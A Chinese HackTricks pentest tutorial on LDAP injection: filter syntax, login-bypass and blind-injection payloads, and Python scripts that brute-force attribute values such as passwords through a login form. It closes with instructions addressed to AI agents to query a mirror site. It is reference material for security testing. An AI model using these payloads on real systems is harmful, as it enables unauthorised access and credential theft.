# LDAP Injection ## LDAP注入

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS红队专家）！

支持HackTricks的其他方式： * 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 获取[**官方PEASS＆HackTricks周边产品**](https://peass.creator-spring.com) * 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品 * **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。** * 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

如果您对**黑客职业**感兴趣并想要黑掉无法黑掉的东西 - **我们正在招聘！**（需要流利的波兰语书面和口语表达能力）。 {% embed url="" %} ## LDAP注入 ### **LDAP** **如果您想了解LDAP是什么，请访问以下页面：** {% content-ref url="/pages/R0Yf80yXKM6IqcZVXzmD" %} [389, 636, 3268, 3269 - Pentesting LDAP](/network-services-pentesting/pentesting-ldap.md) {% endcontent-ref %} **LDAP注入**是一种针对从用户输入构建LDAP语句的Web应用程序的攻击。当应用程序**未能正确清理**输入时，攻击者可以通过本地代理**操纵LDAP语句**，可能导致未经授权的访问或数据操纵。 {% file src="/files/aF3nz4D8icZX4dxBHKNv" %} **过滤器** =（filtercomp）\ **Filtercomp** = and / or / not / item\ **And** = & filterlist\ **Or** = |filterlist\ **Not** = ! filter\ **Filterlist** = 1\*filter\ **Item**= simple / present / substring\ **Simple** = attr filtertype assertionvalue\ **Filtertype** = *'=' / '\~=' / '>=' / '<='*\ **Present** = attr = \*\ **Substring** = attr ”=” \[initial] \* \[final]\ **Initial** = assertionvalue\ **Final** = assertionvalue\ \&#xNAN;**(&)** = 绝对TRUE\ \&#xNAN;**(|)** = 绝对FALSE 例如：\ `(&(!(objectClass=Impresoras))(uid=s*))`\ `(&(objectClass=user)(uid=*))` 您可以访问数据库，其中可能包含各种不同类型的信息。 **OpenLDAP**：如果有2个过滤器到达，只执行第一个。\ **ADAM或Microsoft LDS**：有2个过滤器时会抛出错误。\ **SunOne Directory Server 5.0**：执行两个过滤器。 **非常重要的是发送具有正确语法的过滤器，否则将抛出错误。最好只发送1个过滤器。** 过滤器必须以`&`或`|`开头\ 示例：`(&(directory=val1)(folder=public))` `(&(objectClass=VALUE1)(type=Epson*))`\ `VALUE1 = *)(ObjectClass=*))(&(objectClass=void` 然后：`(&(objectClass=`\*\*`*)(ObjectClass=*))`\*\*将是第一个过滤器（执行的过滤器）。 ### 登录绕过 LDAP支持多种格式存储密码：明文、md5、smd5、sh1、sha、crypt。因此，无论您在密码中插入什么，它都可能被哈希处理。 ```bash user=* password=* --> (&(user=*)(password=*)) # The asterisks are great in LDAPi ``` ```bash user=*)(& password=*)(& --> (&(user=*)(&)(password=*)(&)) ``` ```bash user=*)(|(& pass=pwd) --> (&(user=*)(|(&)(pass=pwd)) ``` ```bash user=*)(|(password=* password=test) --> (&(user=*)(|(password=*)(password=test)) ``` ```bash user=*))%00 pass=any --> (&(user=*))%00 --> Nothing more is executed ``` ```bash user=admin)(&) password=pwd --> (&(user=admin)(&))(password=pwd) #Can through an error ``` ```bash username = admin)(!(&(| pass = any)) --> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True. ``` ```bash username=* password=*)(& --> (&(user=*)(password=*)(&)) ``` ```bash username=admin))(|(| password=any --> (&(uid=admin)) (| (|) (webpassword=any)) ``` #### 列表 * [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_FUZZ.txt) * [LDAP 属性](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt) * [LDAP PosixAccount 属性](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html) ### 盲 LDAP 注入您可以强制 False 或 True 响应以检查是否返回任何数据，并确认可能存在盲 LDAP 注入： ```bash #This will result on True, so some information will be shown Payload: *)(objectClass=*))(&objectClass=void Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*)) ``` ```bash #This will result on True, so no information will be returned or shown Payload: void)(objectClass=void))(&objectClass=void Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*)) ``` #### 转储数据您可以迭代ASCII字母、数字和符号： ```bash (&(sn=administrator)(password=*)) : OK (&(sn=administrator)(password=A*)) : KO (&(sn=administrator)(password=B*)) : KO ... (&(sn=administrator)(password=M*)) : OK (&(sn=administrator)(password=MA*)) : KO (&(sn=administrator)(password=MB*)) : KO ... ``` ### 脚本 #### **发现有效的LDAP字段** LDAP对象**默认包含多个属性**，可用于**保存信息**。您可以尝试**暴力破解所有这些属性以提取信息**。您可以在[**此处找到默认LDAP属性列表**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)。 ```python #!/usr/bin/python3 import requests import string from time import sleep import sys proxy = { "http": "localhost:8080" } url = "http://10.10.10.10/login.php" alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;" attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",] for attribute in attributes: #Extract all attributes value = "" finish = False while not finish: for char in alphabet: #In each possition test each possible printable char query = f"*)({attribute}={value}{char}*" data = {'login':query, 'password':'bla'} r = requests.post(url, data=data, proxies=proxy) sys.stdout.write(f"\r{attribute}: {value}{char}") #sleep(0.5) #Avoid brute-force bans if "Cannot login" in r.text: value += str(char) break if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value finish = True print() ``` #### **特殊盲LDAP注入（无"\*"）** ```python #!/usr/bin/python3 import requests, string alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;" flag = "" for i in range(50): print("[i] Looking for number " + str(i)) for char in alphabet: r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char) if ("TRUE CONDITION" in r.text): flag += char print("[+] Flag: " + flag) break ``` ### 谷歌黑客搜索指令 ```bash intitle:"phpLDAPadmin" inurl:cmd.php ``` ### 更多有效载荷 {% embed url="" %}

如果您对**黑客职业**感兴趣并想要黑入无法黑入的系统 - **我们正在招聘！**（需要流利的波兰语书面和口语表达能力）。 {% embed url="" %}

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS红队专家）！

支持HackTricks的其他方式： * 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) * 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) * **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。** * 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hacktricks.xsx.tw/pentesting-web/ldap-injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.